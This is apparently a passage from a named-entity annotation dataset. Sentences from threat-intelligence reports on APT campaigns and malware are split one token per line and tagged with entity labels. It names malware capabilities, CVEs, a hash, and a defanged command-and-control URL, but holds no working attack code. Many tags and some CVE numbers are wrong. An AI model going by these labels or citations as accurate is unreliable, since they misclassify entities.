+Group O
+. O
+
+The O
+techniques O
+and O
+modules O
+employed O
+by O
+EvilGnome S-APT
+— O
+that O
+is O
+the O
+use O
+of O
+SFX S-MAL
+, O
+persistence O
+with O
+task O
+scheduler O
+and O
+the O
+deployment O
+of O
+information O
+stealing O
+tools—remind O
+us O
+of O
+Gamaredon O
+Group’s O
+Windows B-FILE
+tools E-FILE
+. O
+
+We O
+can O
+observe O
+that O
+the O
+sample S-FILE
+is O
+very O
+recent O
+, O
+created O
+on O
+Thursday O
+, O
+July B-TIME
+4 E-TIME
+
+As O
+can O
+be O
+observed O
+in O
+the O
+illustration O
+above O
+, O
+the O
+makeself B-FILE
+script E-FILE
+is O
+instructed O
+to O
+run O
+./setup.sh S-FILE
+after O
+unpacking O
+. O
+
+The O
+ShooterAudio B-FILE
+module E-FILE
+uses O
+PulseAudio S-MAL
+to O
+capture O
+audio O
+from O
+the O
+user's O
+microphone O
+. O
+
+makeself.sh S-FILE
+is O
+a O
+small O
+shell B-FILE
+script E-FILE
+that O
+generates O
+a O
+self-extractable O
+compressed O
+tar O
+archive O
+from O
+a O
+directory O
+. O
+
+The O
+RAT S-FILE
+, O
+however O
+, O
+had O
+a O
+multitude O
+of O
+functionalities O
+(as O
+listed O
+in O
+the O
+table O
+below) O
+such O
+as O
+to O
+download O
+and O
+execute O
+, O
+compress O
+, O
+encrypt O
+, O
+upload O
+, O
+search O
+directories O
+, O
+etc O
+. O
+
+In O
+a O
+more O
+recent O
+version O
+of O
+the O
+modified O
+Gh0st B-FILE
+RAT E-FILE
+malware O
+, O
+Ghost B-APT
+Dragon E-APT
+implemented O
+dynamic O
+packet O
+flags O
+which O
+change O
+the O
+first O
+five O
+bytes O
+of O
+the O
+header O
+in O
+every O
+login O
+request O
+with O
+the O
+controller O
+. O
+
+One O
+hour O
+later O
+, O
+Bemstour S-FILE
+was O
+used O
+against O
+an O
+educational O
+institution O
+in O
+Belgium S-FILE
+. O
+
+Bemstour S-FILE
+is O
+specifically O
+designed O
+to O
+deliver O
+a O
+variant O
+of O
+the O
+DoublePulsar B-MAL
+backdoor E-MAL
+. O
+
+DoublePulsar S-FILE
+is O
+then O
+used O
+to O
+inject O
+a O
+secondary O
+payload O
+, O
+which O
+runs O
+in O
+memory O
+only O
+. O
+
+A O
+significantly O
+improved O
+variant O
+of O
+the O
+Bemstour S-FILE
+exploit S-VULNAME
+tool O
+was O
+rolled O
+out O
+in O
+September B-TIME
+2016 E-TIME
+, O
+when O
+it O
+was O
+used O
+in O
+an O
+attack O
+against O
+an O
+educational O
+institution O
+in O
+Hong B-LOC
+Kong E-LOC
+. O
+
+Bemstour S-FILE
+was O
+used O
+again O
+in O
+June O
+2017 O
+in O
+an O
+attack O
+against O
+an O
+organization O
+in O
+Luxembourg S-LOC
+. O
+
+Between O
+June O
+and O
+September O
+2017 O
+, O
+Bemstour S-FILE
+was O
+also O
+used O
+against O
+targets O
+in O
+the O
+Philippines S-LOC
+and O
+Vietnam S-LOC
+. O
+
+Development O
+of O
+Bemstour S-FILE
+has O
+continued O
+into O
+2019 S-TIME
+. O
+
+Unlike O
+earlier O
+attacks O
+when O
+Bemstour S-FILE
+was O
+delivered O
+using O
+Buckeye's O
+Pirpi S-FILE
+backdoor S-FILE
+, O
+in O
+this O
+attack O
+Bemstour O
+was O
+delivered O
+to O
+the O
+victim O
+by O
+a O
+different B-MAL
+backdoor E-MAL
+Trojan S-MAL
+( O
+Backdoor.Filensfer S-MAL
+) O
+. O
+
+The O
+most O
+recent O
+sample O
+of O
+Bemstour S-FILE
+seen O
+by O
+Symantec S-SECTEAM
+appears O
+to O
+have O
+been O
+compiled O
+on O
+March B-TIME
+23 E-TIME
+, O
+2019 O
+, O
+eleven O
+days O
+after O
+the O
+zero-day S-VULNAME
+vulnerability O
+was O
+patched O
+by O
+Microsoft S-IDTY
+. O
+
+Filensfer S-FILE
+is O
+a O
+family O
+of O
+malware O
+that O
+has O
+been O
+used O
+in O
+targeted O
+attacks O
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+While O
+Symantec S-SECTEAM
+has O
+never O
+observed O
+the O
+use O
+of O
+Filensfer S-FILE
+alongside O
+any O
+known O
+Buckeye O
+tools O
+, O
+information O
+shared O
+privately O
+by O
+another O
+vendor O
+included O
+evidence O
+of O
+Filensfer O
+being O
+used O
+in O
+conjunction O
+with O
+known O
+Buckeye B-FILE
+malware E-FILE
+(Backdoor.Pirpi) S-MAL
+. O
+
+CVE-2017-0143 S-VULID
+was O
+also O
+used O
+by O
+two O
+other O
+exploit S-VULNAME
+tools—EternalRomance S-FILE
+and O
+EternalSynergy—that S-FILE
+were O
+released O
+as O
+part O
+of O
+the O
+Shadow O
+Brokers O
+leak O
+in O
+April B-TIME
+2017 E-TIME
+. O
+
+Buckeye's O
+exploit S-VULNAME
+tool O
+, O
+EternalRomance S-FILE
+, O
+as O
+well O
+as O
+EternalSynergy S-FILE
+, O
+can O
+exploit S-VULNAME
+the O
+CVE-2017-0143 S-FILE
+message O
+type O
+confusion O
+vulnerability O
+to O
+perform O
+memory O
+corruption O
+on O
+unpatched O
+victim O
+computers O
+. O
+
+this O
+RTF S-TOOL
+exploits O
+again O
+the O
+CVE-2017-1882 S-VULID
+on O
+eqnedt32.exe S-FILE
+. O
+
+And O
+the O
+dropper S-FILE
+execute O
+the O
+iassvcs.exe S-FILE
+to O
+make O
+a O
+side O
+loading O
+and O
+make O
+the O
+persistence O
+. O
+
+Over O
+the O
+past O
+three O
+years O
+, O
+Filensfer S-FILE
+has O
+been O
+deployed O
+against O
+organizations O
+in O
+Luxembourg S-LOC
+, O
+Sweden S-LOC
+, O
+Italy S-LOC
+, O
+the B-LOC
+UK E-LOC
+, O
+and O
+the B-LOC
+U.S E-LOC
+. O
+
+Our O
+analysis O
+of O
+this O
+malware O
+shows O
+that O
+it O
+belongs O
+to O
+Hussarini S-FILE
+, O
+also O
+known O
+as O
+Sarhust O
+, O
+a O
+backdoor O
+family O
+that O
+has O
+been O
+used O
+actively O
+in O
+APT O
+attacks O
+targeting O
+countries O
+in O
+the O
+ASEAN B-LOC
+region E-LOC
+since O
+2014 S-TIME
+. O
+
+OutExtra.exe S-FILE
+is O
+a O
+signed O
+legitimate O
+application O
+from O
+Microsoft S-IDTY
+named O
+finder.exe S-FILE
+. O
+
+Today O
+, O
+this O
+malware S-FILE
+is O
+still O
+actively O
+being O
+used O
+against O
+the O
+Philippines S-LOC
+. O
+
+Xagent” S-FILE
+is O
+the O
+original O
+filename O
+Xagent.exe S-FILE
+whereas O
+seems O
+to O
+be O
+the O
+version O
+of O
+the O
+worm S-FILE
+. O
+
+Our O
+technical O
+analysis O
+of O
+the O
+malware S-FILE
+used O
+in O
+these O
+attacks O
+showed O
+close O
+ties O
+to O
+BS2005 B-FILE
+backdoors E-FILE
+from O
+operation O
+Ke3chang O
+, O
+and O
+to O
+a O
+related O
+TidePool B-FILE
+malware E-FILE
+family O
+discovered O
+by O
+Palo B-SECTEAM
+Alto E-SECTEAM
+Networks O
+in O
+2016 S-TIME
+that O
+targeted O
+Indian O
+embassies O
+across O
+the O
+globe O
+. O
+
+The O
+malicious O
+actors O
+behind O
+the O
+Okrum B-FILE
+malware E-FILE
+were O
+focused O
+on O
+the O
+same O
+targets O
+in O
+Slovakia S-LOC
+that O
+were O
+previously O
+targeted O
+by O
+Ketrican O
+2015 O
+backdoors S-FILE
+. O
+
+We O
+started O
+connecting O
+the O
+dots O
+when O
+we O
+discovered O
+that O
+the O
+Okrum B-FILE
+backdoor E-FILE
+was O
+used O
+to O
+drop O
+a O
+Ketrican B-FILE
+backdoor E-FILE
+, O
+freshly O
+compiled O
+in O
+2017 O
+. O
+
+In O
+2017 O
+, O
+the O
+same O
+entities O
+that O
+were O
+affected O
+by O
+the O
+Okrum B-FILE
+malware E-FILE
+and O
+by O
+the O
+2015 O
+Ketrican B-FILE
+backdoors E-FILE
+again O
+became O
+targets O
+of O
+the O
+malicious O
+actors O
+. O
+
+This O
+time O
+, O
+the O
+attackers O
+used O
+new O
+versions O
+of O
+the O
+RoyalDNS B-FILE
+malware E-FILE
+and O
+a O
+Ketrican S-FILE
+2017 O
+backdoor O
+. O
+
+According O
+to O
+ESET S-SECTEAM
+telemetry O
+, O
+Okrum S-FILE
+was O
+first O
+detected O
+in O
+December B-TIME
+2016 E-TIME
+, O
+and O
+targeted O
+diplomatic O
+missions O
+in O
+Slovakia S-LOC
+, O
+Belgium S-LOC
+, O
+Chile S-LOC
+, O
+Guatemala S-LOC
+and O
+Brazil S-LOC
+throughout O
+2017 O
+. O
+
+According O
+to O
+our O
+telemetry O
+, O
+Okrum S-FILE
+was O
+used O
+to O
+target O
+diplomatic O
+missions O
+in O
+Slovakia S-LOC
+, O
+Belgium S-LOC
+, O
+Chile S-LOC
+, O
+Guatemala S-LOC
+, O
+and O
+Brazil S-LOC
+, O
+with O
+the O
+attackers O
+showing O
+a O
+particular O
+interest O
+in O
+Slovakia O
+. O
+
+The O
+detection O
+evasion O
+techniques O
+we O
+observed O
+in O
+the O
+Okrum S-FILE
+malware O
+include O
+embedding O
+the O
+malicious O
+payload O
+within O
+a O
+legitimate O
+PNG O
+image O
+, O
+employing O
+several O
+anti-emulation O
+and O
+anti-sandbox O
+tricks O
+, O
+as O
+well O
+as O
+making O
+frequent O
+changes O
+in O
+implementation O
+. O
+
+According O
+to O
+ClearSky S-SECTEAM
+, O
+the O
+suspected O
+Lazarus O
+operatives O
+looked O
+to O
+leverage O
+a O
+vulnerability O
+in O
+outdated O
+WinRAR S-FILE
+file-archiving O
+software O
+that O
+hackers O
+have O
+been O
+exploiting O
+since O
+it O
+was O
+disclosed O
+last O
+month O
+. O
+
+The O
+diagram O
+below O
+illustrates O
+how O
+we O
+believe O
+the O
+actors O
+behind O
+the O
+Sea B-FILE
+Turtle E-FILE
+campaign O
+used O
+DNS S-PROT
+hijacking O
+to O
+achieve O
+their O
+end O
+goals O
+. O
+
+If O
+the O
+user O
+enables O
+macro O
+to O
+open O
+the O
+xlsm B-MAL
+file E-MAL
+, O
+it S-FILE
+will O
+then O
+drop O
+the O
+legitimate O
+script O
+engine O
+AutoHotkey O
+along O
+with O
+a O
+malicious O
+script O
+file O
+. O
+
+Create O
+a O
+link B-FILE
+file E-FILE
+in O
+the O
+startup O
+folder O
+for O
+AutoHotkeyU32.exe S-FILE
+, O
+allowing O
+the O
+attack O
+to O
+persist O
+even O
+after O
+a O
+system O
+restart O
+. O
+
+Such O
+attacks S-FILE
+highlight O
+the O
+need O
+for O
+caution O
+before O
+downloading B-ACT
+files E-ACT
+from O
+unknown O
+sources O
+and O
+enabling O
+macro O
+for O
+files O
+from O
+unknown O
+sources O
+. O
+
+Honeycomb S-FILE
+toolserver O
+receives O
+exfiltrated O
+information O
+from O
+the O
+implant; O
+an O
+operator O
+can O
+also O
+task O
+the O
+implant O
+to O
+execute O
+jobs O
+on O
+the O
+target O
+computer O
+, O
+so O
+the O
+toolserver O
+acts O
+as O
+a O
+C2 S-TOOL
+(command O
+and O
+control) O
+server O
+for O
+the O
+implant O
+. O
+
+UMBRAGE S-FILE
+components O
+cover O
+keyloggers O
+, O
+password O
+collection O
+, O
+webcam O
+capture O
+, O
+data O
+destruction O
+, O
+persistence O
+, O
+privilege O
+escalation O
+, O
+stealth O
+, O
+anti-virus O
+(PSP) O
+avoidance O
+and O
+survey O
+techniques O
+. O
+
+'Improvise' S-FILE
+is O
+a O
+toolset O
+for O
+configuration O
+, O
+post-processing O
+, O
+payload O
+setup O
+and O
+execution O
+vector O
+selection O
+for O
+survey/Exfiltration S-ACT
+tools O
+supporting O
+all O
+major O
+operating O
+systems O
+like O
+Windows S-OS
+( O
+Bartender S-TOOL
+) O
+, O
+MacOS S-OS
+( O
+JukeBox S-TOOL
+) O
+and O
+Linux S-ACT
+( O
+DanceFloor S-TOOL
+) O
+. O
+
+This O
+sample S-FILE
+, O
+similar O
+to O
+other O
+Trochilus S-FILE
+samples O
+, O
+was O
+deployed O
+using O
+a O
+DLL S-TOOL
+sideloading O
+method O
+utilizing O
+three O
+files O
+, O
+uploaded O
+to O
+the O
+same O
+folder O
+on O
+the O
+victim O
+machine O
+as O
+identified O
+in O
+US-CERT O
+advisory O
+TA17-117A O
+last O
+revised O
+on O
+December O
+20 O
+, O
+2018 S-TIME
+. O
+
+The O
+configuration B-FILE
+file E-FILE
+then O
+loads O
+the O
+Trochilus O
+payload O
+into O
+memory O
+by O
+injecting O
+it O
+into O
+a O
+valid O
+system O
+process O
+. O
+
+Additionally O
+, O
+the O
+same O
+DLL S-TOOL
+sideloading O
+technique O
+observed O
+in O
+the O
+Visma S-MAL
+attack O
+was O
+used O
+, O
+and O
+many O
+of O
+the O
+tools O
+deployed O
+by O
+the O
+APT10 S-APT
+shared O
+naming O
+similarities O
+as O
+well O
+1.bat S-MAL
+, O
+cu.exe S-MAL
+, O
+ss.rar S-MAL
+, O
+r.exe S-MAL
+, O
+pd.exe S-MAL
+. O
+Most O
+interestingly O
+, O
+Rapid7 S-SECTEAM
+observed O
+the O
+use O
+of O
+the O
+Notepad++ O
+updater O
+gup.exe S-FILE
+as O
+a O
+legitimate O
+executable O
+to O
+sideload O
+a O
+malicious O
+DLL S-TOOL
+(libcurl.dll) O
+in O
+order O
+to O
+deploy O
+a O
+variant O
+of O
+the O
+UPPERCUT O
+backdoor O
+also O
+known O
+as O
+ANEL S-FILE
+. O
+
+Insikt B-APT
+Group E-APT
+analysis O
+of O
+network O
+metadata O
+to O
+and O
+from O
+the O
+VPN S-TOOL
+endpoint O
+IPs O
+revealed O
+consistent O
+connectivity O
+to O
+Citrix-hosted S-FILE
+infrastructure O
+from O
+all O
+eight O
+VPN S-TOOL
+endpoint O
+IPs O
+starting O
+on O
+August B-TIME
+17 E-TIME
+, O
+2018 S-TIME
+— O
+the O
+same O
+date O
+the O
+first O
+authenticated O
+login O
+to O
+Visma’s O
+network O
+was O
+made O
+using O
+stolen O
+credentials O
+. O
+
+KHRAT S-FILE
+is O
+a O
+backdoor B-MAL
+trojan E-MAL
+purported O
+to O
+be O
+used O
+with O
+the O
+China-linked S-LOC
+cyberespionage O
+group O
+DragonOK S-APT
+. O
+
+Rapid7 S-SECTEAM
+reviewed O
+malware O
+discovered O
+in O
+the O
+victim’s O
+environment O
+and O
+found O
+implants O
+that O
+used O
+Dropbox S-FILE
+as O
+the O
+C2 S-TOOL
+. O
+
+The O
+analyzed O
+RTF O
+files O
+share O
+the O
+same O
+object O
+dimension O
+(objw2180\objh300) O
+used O
+to O
+track O
+the O
+RTF O
+weaponizer O
+in O
+our O
+previous O
+report O
+, O
+however O
+, O
+the O
+sample S-FILE
+was O
+not O
+exploiting O
+CVE-2017-11882 S-VULID
+or O
+CVE-2018-0802 S-VULID
+. O
+
+After O
+further O
+analysis O
+, O
+it O
+was O
+discovered O
+that O
+the O
+RTF B-FILE
+files E-FILE
+were O
+exploiting O
+the O
+CVE-2018-0798 S-VULID
+vulnerability O
+in O
+Microsoft S-IDTY
+’s O
+Equation B-TOOL
+Editor E-TOOL
+( O
+EQNEDT32 S-TOOL
+) O
+. O
+
+Anomali S-SECTEAM
+Researchers O
+were O
+able O
+to O
+identify O
+multiple O
+samples O
+of O
+malicious O
+RTF O
+documents O
+ITW S-FILE
+using O
+the O
+same O
+exploit S-VULNAME
+for O
+CVE-2018-0798 S-VULID
+. O
+
+The O
+earliest O
+use O
+of O
+the O
+exploit S-VULNAME
+ITW S-FILE
+we O
+were O
+able O
+to O
+identify O
+and O
+confirm O
+is O
+a O
+sample O
+(e228045ef57fb8cc1226b62ada7eee9b) O
+dating O
+back O
+to O
+October B-TIME
+2018 E-TIME
+(VirusTotal S-TOOL
+submission O
+of O
+2018-10-29) O
+with O
+the O
+RTF S-TOOL
+creation O
+time O
+2018-10-23 S-TIME
+. O
+
+Upon O
+decrypting O
+and O
+executing O
+, O
+it O
+drops O
+two O
+additional O
+files O
+wsc_proxy.exe” S-FILE
+(legitimate O
+Avast O
+executable) O
+and O
+a O
+malicious O
+DLL S-TOOL
+wsc.dll” S-FILE
+in O
+the O
+%TEMP% O
+folder O
+. O
+
+However O
+, O
+Beginning O
+on O
+25 O
+June O
+2019 O
+, O
+we O
+started O
+observing O
+multiple O
+commodity O
+campaigns O
+Mostly O
+dropping O
+AsyncRAT S-FILE
+using O
+the O
+updated O
+RTF O
+weaponizer O
+with O
+the O
+same O
+exploit S-VULNAME
+( O
+CVE-2018-0798 S-VULID
+) O
+. O
+
+In O
+addition O
+, O
+a O
+current O
+ANY.RUN S-FILE
+playback O
+of O
+our O
+observed O
+Elise S-FILE
+infection O
+is O
+also O
+available O
+. O
+
+Upon O
+opening O
+of O
+the O
+MS O
+Word S-TOOL
+document O
+, O
+our O
+embedded O
+file O
+exploits O
+CVE-2017-11882 S-VULID
+to O
+drop O
+a O
+malicious O
+fake O
+Norton O
+Security O
+Shell O
+Extension O
+module O
+, O
+'NavShExt.dll' S-FILE
+, O
+which O
+is O
+then O
+injected O
+into O
+iexplore.exe S-FILE
+to O
+install O
+the O
+backdoor O
+, O
+begin O
+collection O
+, O
+and O
+activate O
+command O
+and O
+control O
+. O
+
+Moving O
+through O
+the O
+infection O
+process O
+, O
+NetWitness O
+Endpoint O
+detects O
+the O
+initial O
+exploit S-VULNAME
+CVE-2017-1182 S-VULID
+in O
+action O
+as O
+the O
+Microsoft B-FILE
+Equation I-FILE
+Editor E-FILE
+, O
+'EQNEDT32.exe' S-FILE
+, O
+scores O
+high O
+for O
+potentially O
+malicious O
+activity O
+. O
+
+The O
+well-crafted O
+and O
+socially O
+engineered O
+malicious O
+documents O
+then O
+become O
+the O
+first O
+stage O
+of O
+a O
+long O
+and O
+mainly O
+fileless O
+infection O
+chain O
+that O
+eventually O
+delivers O
+POWERSTATS S-FILE
+, O
+a O
+signature O
+PowerShell B-FILE
+backdoor E-FILE
+of O
+this O
+threat O
+group O
+. O
+
+This O
+powerful O
+backdoor S-FILE
+can O
+receive O
+commands O
+from O
+the O
+attackers O
+, O
+enabling O
+it O
+to O
+exfiltrate O
+files O
+from O
+the O
+system O
+it O
+is O
+running O
+on O
+, O
+execute O
+additional O
+scripts O
+, O
+delete O
+files O
+, O
+and O
+more O
+. O
+
+If O
+the O
+macros O
+in O
+SPK B-FILE
+KANUN E-FILE
+DEĞİŞİKLİĞİ O
+GİB O
+GÖRÜŞÜ.doc” O
+are O
+enabled O
+, O
+an O
+embedded O
+payload O
+is O
+decoded O
+and O
+saved O
+in O
+the O
+%APPDATA% O
+directory O
+with O
+the O
+name O
+CiscoAny.exe” S-FILE
+. O
+
+INF B-MAL
+files E-MAL
+have O
+been O
+used O
+in O
+the O
+past O
+by O
+MuddyWater S-APT
+, O
+although O
+they O
+were O
+launched O
+using O
+Advpack.dll S-MAL
+and O
+not O
+IEAdvpack.dll S-MAL
+. O
+
+In O
+addition O
+, O
+by O
+using O
+VBA2Graph S-FILE
+, O
+we O
+were O
+able O
+to O
+visualize O
+the O
+VBA O
+call O
+graph O
+in O
+the O
+macros O
+of O
+each O
+document O
+. O
+
+We O
+assume O
+that O
+RunPow O
+stands O
+for O
+run O
+PowerShell S-TOOL
+, O
+” O
+and O
+triggers O
+the O
+PowerShell S-TOOL
+code O
+embedded O
+inside O
+the O
+.dll B-FILE
+file E-FILE
+. O
+
+The O
+main O
+delivery O
+method O
+of O
+this O
+type O
+of O
+backdoor S-FILE
+is O
+spear S-ACT
+phishing S-ACT
+emails S-TOOL
+or O
+spam S-ACT
+that O
+uses O
+social O
+engineering O
+to O
+manipulate O
+targets O
+into O
+enabling O
+malicious O
+documents O
+. O
+
+This O
+includes O
+Python S-TOOL
+scripts O
+. O
+Usually O
+, O
+the O
+Stageless B-FILE
+Meterpreter E-FILE
+has O
+the O
+Ext_server_stdapi.x64.dll” S-FILE
+, O
+Ext_server_extapi.x64.dll” S-FILE
+, O
+and O
+Ext_server_espia.x64.dll” S-FILE
+extensions O
+. O
+
+However O
+, O
+Kaspersky S-SECTEAM
+Security O
+Network O
+(KSN) O
+records O
+also O
+contain O
+links O
+that O
+victims O
+clicked O
+from O
+the O
+Outlook S-TOOL
+web O
+client O
+outlook.live.com” S-FILE
+as O
+well O
+as O
+attachments O
+arriving O
+through O
+the O
+Outlook S-TOOL
+desktop O
+application O
+. O
+
+The O
+JavaScript S-FILE
+forces O
+visiting O
+web O
+browsers O
+to O
+collect O
+and O
+send O
+(via O
+a O
+POST O
+request) O
+web O
+browser O
+, O
+browser O
+version O
+, O
+country O
+of O
+origin O
+, O
+and O
+IP S-PROT
+address O
+data O
+to O
+the O
+attacker O
+controlled O
+server O
+jquerycodedownload.live/check.aspx” O
+. O
+
+we O
+identified O
+two O
+methods O
+to O
+deliver O
+the O
+KerrDown S-FILE
+downloader O
+to O
+targets O
+. O
+
+The O
+link O
+to O
+the O
+final O
+payload O
+of O
+KerrDown S-FILE
+was O
+still O
+active O
+during O
+the O
+time O
+of O
+analysis O
+and O
+hence O
+we O
+were O
+able O
+to O
+download O
+a O
+copy O
+which O
+turned O
+out O
+to O
+be O
+a O
+variant O
+of O
+Cobalt O
+Strike O
+Beacon O
+. O
+
+While O
+investigating O
+KerrDown S-FILE
+we O
+found O
+multiple O
+RAR O
+files O
+containing O
+a O
+variant O
+of O
+the O
+malware O
+. O
+
+The O
+dropped O
+PE S-MAL
+file O
+has O
+the O
+distinctive O
+file O
+name O
+8.t” S-FILE
+. O
+
+The O
+malware S-FILE
+was O
+first O
+seen O
+packed O
+with O
+VMProtect; O
+when O
+unpacked O
+the O
+sample O
+didn’t O
+show O
+any O
+similarities O
+with O
+previously O
+known O
+malware O
+. O
+
+The O
+malware S-FILE
+starts O
+communicating O
+with O
+the O
+C&C S-TOOL
+server O
+by O
+sending O
+basic O
+information O
+about O
+the O
+infected O
+machine O
+. O
+
+The O
+malware S-FILE
+basically O
+provides O
+a O
+remote O
+CMD/PowerShell S-MAL
+terminal O
+for O
+the O
+attackers S-APT
+, O
+enabling O
+them O
+to O
+execute O
+scripts/commands O
+and O
+receive O
+the O
+results O
+via O
+HTTP S-PROT
+requests O
+. O
+
+This O
+time O
+the O
+document O
+purported O
+to O
+be O
+about O
+the O
+involvement O
+of O
+the O
+Emir S-LOC
+of O
+Qatar S-LOC
+in O
+funding O
+ISIS S-LOC
+, O
+which O
+was O
+seemingly O
+copied O
+from O
+a O
+website O
+critical O
+of O
+Qatar O
+. O
+
+The O
+SDK S-MAL
+, O
+named O
+SWAnalytics S-FILE
+is O
+integrated O
+into O
+seemingly O
+innocent O
+Android S-OS
+applications O
+published B-ACT
+on E-ACT
+major O
+3rd O
+party O
+Chinese O
+app O
+stores O
+such O
+as O
+Tencent B-IDTY
+MyApp E-IDTY
+, O
+Wandoujia S-IDTY
+, O
+Huawei B-IDTY
+App I-IDTY
+Store E-IDTY
+, O
+and O
+Xiaomi B-IDTY
+App I-IDTY
+Store E-IDTY
+. O
+
+After O
+app O
+installation O
+, O
+whenever O
+SWAnalytics S-FILE
+senses O
+victims O
+opening O
+up O
+infected O
+applications O
+or O
+rebooting O
+their O
+phones O
+, O
+it O
+silently O
+uploads O
+their O
+entire O
+contacts O
+list O
+to O
+Hangzhou O
+Shun O
+Wang O
+Technologies O
+controlled O
+servers O
+. O
+
+This O
+module S-FILE
+monitors O
+a O
+wide O
+range O
+of O
+device O
+activities O
+including O
+application O
+installation O
+/ O
+remove O
+/ O
+update O
+, O
+phone O
+restart O
+and O
+battery O
+charge O
+. O
+
+It O
+turns O
+out O
+that O
+contacts O
+data O
+isn’t O
+the O
+only O
+unusual O
+data O
+SWAnalytics S-FILE
+is O
+interested O
+in O
+. O
+
+With O
+default O
+settings O
+, O
+SWAnalytics S-FILE
+will O
+scan O
+through O
+an O
+Android S-OS
+device’s O
+external O
+storage O
+, O
+looking O
+for O
+directory O
+tencent/MobileQQ/WebViewCheck” O
+. O
+
+From O
+our O
+first O
+malicious B-FILE
+sample E-FILE
+encounter O
+back O
+in O
+mid-September S-TIME
+until O
+now O
+, O
+we O
+have O
+observed O
+12 O
+infected O
+applications O
+, O
+the O
+majority O
+of O
+which O
+are O
+in O
+the O
+system O
+utility O
+category O
+. O
+
+By O
+listing O
+sub-folders O
+, O
+SWAnalytics S-FILE
+is O
+able O
+to O
+infer O
+QQ O
+accounts O
+which O
+have O
+never O
+been O
+used O
+on O
+the O
+device O
+. O
+
+To O
+make O
+this O
+data O
+harvesting O
+operation O
+flexible O
+, O
+SWAnalytics S-FILE
+equips O
+the O
+ability O
+to O
+receive O
+and O
+process O
+configuration O
+files O
+from O
+a O
+remote O
+Command-and-Control O
+. O
+
+Whenever O
+users O
+reboot O
+their O
+device O
+or O
+open O
+up O
+Network B-ACT
+Speed I-ACT
+Master E-ACT
+, O
+SWAnalytics S-FILE
+will O
+fetch O
+the O
+latest O
+configuration O
+file O
+from O
+http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” O
+. O
+
+In O
+order O
+to O
+understand O
+SWAnalytics’ S-FILE
+impact O
+, O
+we O
+turned O
+to O
+public O
+download O
+volume O
+data O
+available O
+on O
+Chandashi O
+, O
+one O
+of O
+the O
+app O
+store O
+optimization O
+vendors O
+specialized O
+in O
+Chinese S-LOC
+mobile O
+application O
+markets O
+. O
+
+According O
+to O
+Cheetah O
+Mobile’s O
+follow-up O
+investigation O
+, O
+fraudulent O
+behaviors O
+came O
+from O
+two O
+3rd O
+party O
+SDKs O
+Batmobi S-FILE
+, O
+Duapps S-FILE
+integrated O
+inside O
+Cheetah B-FILE
+SDK E-FILE
+. O
+
+It O
+is O
+likely O
+a O
+new O
+campaign O
+or O
+actor S-APT
+started O
+using O
+Panda B-MAL
+Banker E-MAL
+since O
+in O
+addition O
+to O
+the O
+previously O
+unseen O
+Japanese S-LOC
+targeting O
+, O
+Arbor S-SECTEAM
+has O
+not O
+seen O
+any O
+indicator O
+of O
+compromise O
+(IOC) O
+overlaps O
+with O
+previous O
+Panda B-FILE
+Banker E-FILE
+campaigns O
+. O
+
+Webinjects O
+targeting O
+Japan S-LOC
+, O
+a O
+country O
+we O
+haven’t O
+seen O
+targeted O
+by O
+Panda B-FILE
+Banker E-FILE
+before O
+. O
+
+Japan S-LOC
+is O
+no O
+stranger O
+to O
+banking S-FILE
+malware S-FILE
+. O
+
+Based O
+on O
+recent O
+reports O
+, O
+the O
+country S-LOC
+has O
+been O
+plagued O
+by O
+attacks O
+using O
+the O
+Ursnif S-FILE
+and O
+Urlzone S-FILE
+banking O
+malware O
+. O
+
+This O
+post O
+was O
+our O
+first O
+analysis O
+of O
+the O
+first O
+Panda B-FILE
+Banker E-FILE
+campaign O
+that O
+we’ve O
+seen O
+to O
+target O
+financial B-IDTY
+institutions E-IDTY
+in O
+Japan S-LOC
+. O
+
+we O
+believe O
+the O
+iOS O
+malware O
+gets O
+installed O
+on O
+already O
+compromised O
+systems O
+, O
+and O
+it O
+is O
+very O
+similar O
+to O
+next O
+stage O
+SEDNIT S-FILE
+malware O
+we O
+have O
+found O
+for O
+Microsoft S-IDTY
+Windows’ O
+systems O
+. O
+
+One O
+is O
+called O
+XAgent S-FILE
+detected O
+as O
+IOS_XAGENT.A S-FILE
+and O
+the O
+other O
+one O
+uses O
+the O
+name O
+of O
+a O
+legitimate O
+iOS O
+game O
+, O
+MadCap S-FILE
+detected O
+as O
+IOS_ O
+XAGENT.B S-FILE
+. O
+
+Madcap” S-FILE
+is O
+similar O
+to O
+the O
+XAgent S-FILE
+malware O
+, O
+but O
+the O
+former O
+is O
+focused O
+on O
+recording O
+audio O
+. O
+
+This O
+full-blown O
+spying O
+framework O
+consists O
+of O
+two O
+packages O
+named O
+‘Tokyo’ S-FILE
+and O
+‘Yokohama’ S-FILE
+. O
+
+Just O
+to O
+highlight O
+its O
+capabilities O
+, O
+TajMahal S-FILE
+is O
+able O
+to O
+steal O
+data O
+from O
+a O
+CD O
+burnt O
+by O
+a O
+victim O
+as O
+well O
+as O
+from O
+the O
+printer O
+queue O
+. O
+
+The O
+first O
+confirmed O
+date O
+when O
+TajMahal S-FILE
+samples O
+were O
+seen O
+on O
+a O
+victim’s O
+machine O
+is O
+August S-TIME
+2014 S-TIME
+. O
+
+More O
+details O
+about O
+TajMahal S-FILE
+are O
+available O
+to O
+customers O
+of O
+the O
+Kaspersky S-SECTEAM
+Intelligence O
+Reporting O
+service O
+. O
+
+The O
+delivery O
+of O
+KopiLuwak O
+in O
+this O
+instance O
+is O
+currently O
+unknown O
+as O
+the O
+MSIL B-FILE
+dropper E-FILE
+has O
+only O
+been O
+observed O
+by O
+Proofpoint S-SECTEAM
+researchers O
+on O
+a O
+public O
+malware O
+repository O
+. O
+
+The O
+earliest O
+step O
+in O
+any O
+possible O
+attack(s) O
+involving O
+this O
+variant O
+of O
+KopiLuwak S-FILE
+of O
+which O
+Proofpoint O
+researchers O
+are O
+currently O
+aware O
+begin O
+with O
+the O
+MSIL B-FILE
+dropper E-FILE
+. O
+
+The O
+basic O
+chain O
+of O
+events O
+upon O
+execution O
+of O
+the O
+MSIL B-FILE
+dropper E-FILE
+include O
+dropping O
+and O
+executing O
+both O
+a O
+PDF S-TOOL
+decoy O
+and O
+a O
+Javascript B-FILE
+(JS) I-FILE
+dropper E-FILE
+. O
+
+As O
+explained O
+in O
+further O
+detail O
+below O
+, O
+the O
+JS B-FILE
+dropper E-FILE
+ultimately O
+installs O
+a O
+JS B-FILE
+decryptor E-FILE
+onto O
+an O
+infected O
+machine O
+that O
+will O
+then O
+finally O
+decrypt O
+and O
+execute O
+the O
+actual O
+KopiLuwak S-FILE
+backdoor O
+in O
+memory O
+only O
+. O
+
+As O
+Proofpoint S-SECTEAM
+has O
+not O
+yet O
+observed O
